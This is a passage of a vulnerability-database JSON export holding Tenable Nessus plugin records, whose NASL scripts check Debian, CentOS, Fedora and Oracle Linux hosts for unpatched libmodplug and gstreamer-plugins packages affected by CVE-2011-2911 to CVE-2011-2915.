script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2914\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2011-2915\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/libmodplug\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.debian.org/security/2012/dsa-2415\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the libmodplug packages.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 1:0.8.8.1-1+squeeze2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/02/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libmodplug-dev\", reference:\"1:0.8.8.1-1+squeeze2\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libmodplug1\", reference:\"1:0.8.8.1-1+squeeze2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:38:27", "references": ["http://www.nessus.org/u?eee309fb", "http://www.nessus.org/u?dab697ae"], "pluginID": "56126", "description": "Updated gstreamer-plugins packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer streaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws were found in various ModPlug music file format library (libmodplug) modules, embedded in GStreamer. An attacker could create specially crafted music files that, when played by a victim, would cause applications using GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated packages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as Rhythmbox) must be restarted for the changes to take effect.", "edition": 4, "reporter": "Tenable", "published": "2011-09-09T00:00:00", "title": "CentOS 4 : gstreamer-plugins (CESA-2011:1264)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2014-08-16T00:00:00", "cpe": ["cpe:/o:centos:centos:4", "p-cpe:/a:centos:centos:gstreamer-plugins", "p-cpe:/a:centos:centos:gstreamer-plugins-devel"], "id": "CENTOS_RHSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56126", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2011:1264 and \n# CentOS Errata and Security Advisory 2011:1264 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56126);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2014/08/16 19:09:24 $\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"CentOS 4 : gstreamer-plugins (CESA-2011:1264)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2011-September/017719.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eee309fb\"\n );\n # http://lists.centos.org/pipermail/centos-announce/2011-September/017720.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?dab697ae\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gstreamer-plugins packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gstreamer-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:4\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/09\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2014 Tenable Network Security, Inc.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/CentOS/release\")) audit(AUDIT_OS_NOT, \"CentOS\");\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"gstreamer-plugins-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"i386\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\nif (rpm_check(release:\"CentOS-4\", cpu:\"x86_64\", reference:\"gstreamer-plugins-devel-0.8.5-1.EL.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:54:58", "references": ["http://www.nessus.org/u?9e28a386"], "pluginID": "56224", "description": "Patch to use the system's libmodplug library.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2011-09-19T00:00:00", "title": "Fedora 14 : audacious-plugins-2.4.5-4.fc14 (2011-12370)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-07-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:audacious-plugins", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-12370.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=56224", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-12370.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56224);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/07/12 15:01:52\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-12370\");\n\n script_name(english:\"Fedora 14 : audacious-plugins-2.4.5-4.fc14 (2011-12370)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Patch to use the system's libmodplug library.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-September/066044.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9e28a386\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected audacious-plugins package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:audacious-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:14\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^14([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 14.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"audacious-plugins-2.4.5-4.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"audacious-plugins\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:02:43", "references": ["https://oss.oracle.com/pipermail/el-errata/2011-September/002347.html"], "pluginID": "68345", "description": "From Red Hat Security Advisory 2011:1264 :\n\nUpdated gstreamer-plugins packages that fix multiple security issues are now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer streaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one flaws were found in various ModPlug music file format library (libmodplug) modules, embedded in GStreamer. An attacker could create specially crafted music files that, when played by a victim, would cause applications using GStreamer to crash or, potentially, execute arbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913, CVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated packages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as Rhythmbox) must be restarted for the changes to take effect.", "edition": 4, "reporter": "Tenable", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : gstreamer-plugins (ELSA-2011-1264)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2015-12-01T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:gstreamer-plugins-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:gstreamer-plugins"], "id": "ORACLELINUX_ELSA-2011-1264.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=68345", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2011:1264 and \n# Oracle Linux Security Advisory ELSA-2011-1264 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(68345);\n script_version(\"$Revision: 1.4 $\");\n script_cvs_date(\"$Date: 2015/12/01 16:58:00 $\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_bugtraq_id(48979);\n script_xref(name:\"RHSA\", value:\"2011:1264\");\n\n script_name(english:\"Oracle Linux 4 : gstreamer-plugins (ELSA-2011-1264)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2011:1264 :\n\nUpdated gstreamer-plugins packages that fix multiple security issues\nare now available for Red Hat Enterprise Linux 4.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe gstreamer-plugins packages contain plug-ins used by the GStreamer\nstreaming-media framework to support a wide variety of media formats.\n\nAn integer overflow flaw, a boundary error, and multiple off-by-one\nflaws were found in various ModPlug music file format library\n(libmodplug) modules, embedded in GStreamer. An attacker could create\nspecially crafted music files that, when played by a victim, would\ncause applications using GStreamer to crash or, potentially, execute\narbitrary code. (CVE-2011-2911, CVE-2011-2912, CVE-2011-2913,\nCVE-2011-2914, CVE-2011-2915)\n\nAll users of gstreamer-plugins are advised to upgrade to these updated\npackages, which contain backported patches to correct these issues.\nAfter installing the update, all applications using GStreamer (such as\nRhythmbox) must be restarted for the changes to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2011-September/002347.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected gstreamer-plugins packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gstreamer-plugins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gstreamer-plugins-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = eregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL4\", reference:\"gstreamer-plugins-0.8.5-1.0.1.EL.4\")) flag++;\nif (rpm_check(release:\"EL4\", reference:\"gstreamer-plugins-devel-0.8.5-1.0.1.EL.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"gstreamer-plugins / gstreamer-plugins-devel\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:33:59", "references": ["http://www.nessus.org/u?88a98c41", "http://modplug-xmms.sourceforge.net/#news", "https://bugzilla.redhat.com/show_bug.cgi?id=728371"], "pluginID": "55870", "description": "Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news http://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2011-08-17T00:00:00", "title": "Fedora 15 : libmodplug-0.8.8.4-1.fc15 (2011-10544)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2015-10-20T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libmodplug", "cpe:/o:fedoraproject:fedora:15"], "id": "FEDORA_2011-10544.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=55870", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-10544.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55870);\n script_version(\"$Revision: 1.7 $\");\n script_cvs_date(\"$Date: 2015/10/20 21:47:27 $\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-10544\");\n script_xref(name:\"Secunia\", value:\"45131\");\n\n script_name(english:\"Fedora 15 : libmodplug-0.8.8.4-1.fc15 (2011-10544)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://modplug-xmms.sourceforge.net/#news\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=728371\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2011-August/063873.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?88a98c41\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected libmodplug package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libmodplug\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:15\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/08/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/08/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2011-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^15([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 15.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC15\", reference:\"libmodplug-0.8.8.4-1.fc15\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libmodplug\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:10:31", "references": ["http://modplug-xmms.sourceforge.net/#news", "http://www.nessus.org/u?e8739c01", "https://bugzilla.redhat.com/show_bug.cgi?id=728371"], "pluginID": "55869", "description": "Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news http://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 5, "reporter": "Tenable", "published": "2011-08-17T00:00:00", "title": "Fedora 14 : libmodplug-0.8.8.4-1.fc14 (2011-10503)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-2913", "CVE-2011-2912", "CVE-2011-2915", "CVE-2011-2911", "CVE-2011-2914"], "modified": "2018-07-12T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libmodplug", "cpe:/o:fedoraproject:fedora:14"], "id": "FEDORA_2011-10503.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=55869", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2011-10503.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(55869);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2018/07/12 15:01:52\");\n\n script_cve_id(\"CVE-2011-2911\", \"CVE-2011-2912\", \"CVE-2011-2913\", \"CVE-2011-2914\", \"CVE-2011-2915\");\n script_xref(name:\"FEDORA\", value:\"2011-10503\");\n script_xref(name:\"Secunia\", value:\"45131\");\n\n script_name(english:\"Fedora 14 : libmodplug-0.8.8.4-1.fc14 (2011-10503)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to upstream version 0.8.8.4.\n\nhttp://modplug-xmms.sourceforge.net/#news\nhttp://secunia.com/advisories/45131\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://modplug-xmms.sourceforge.net/#news\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 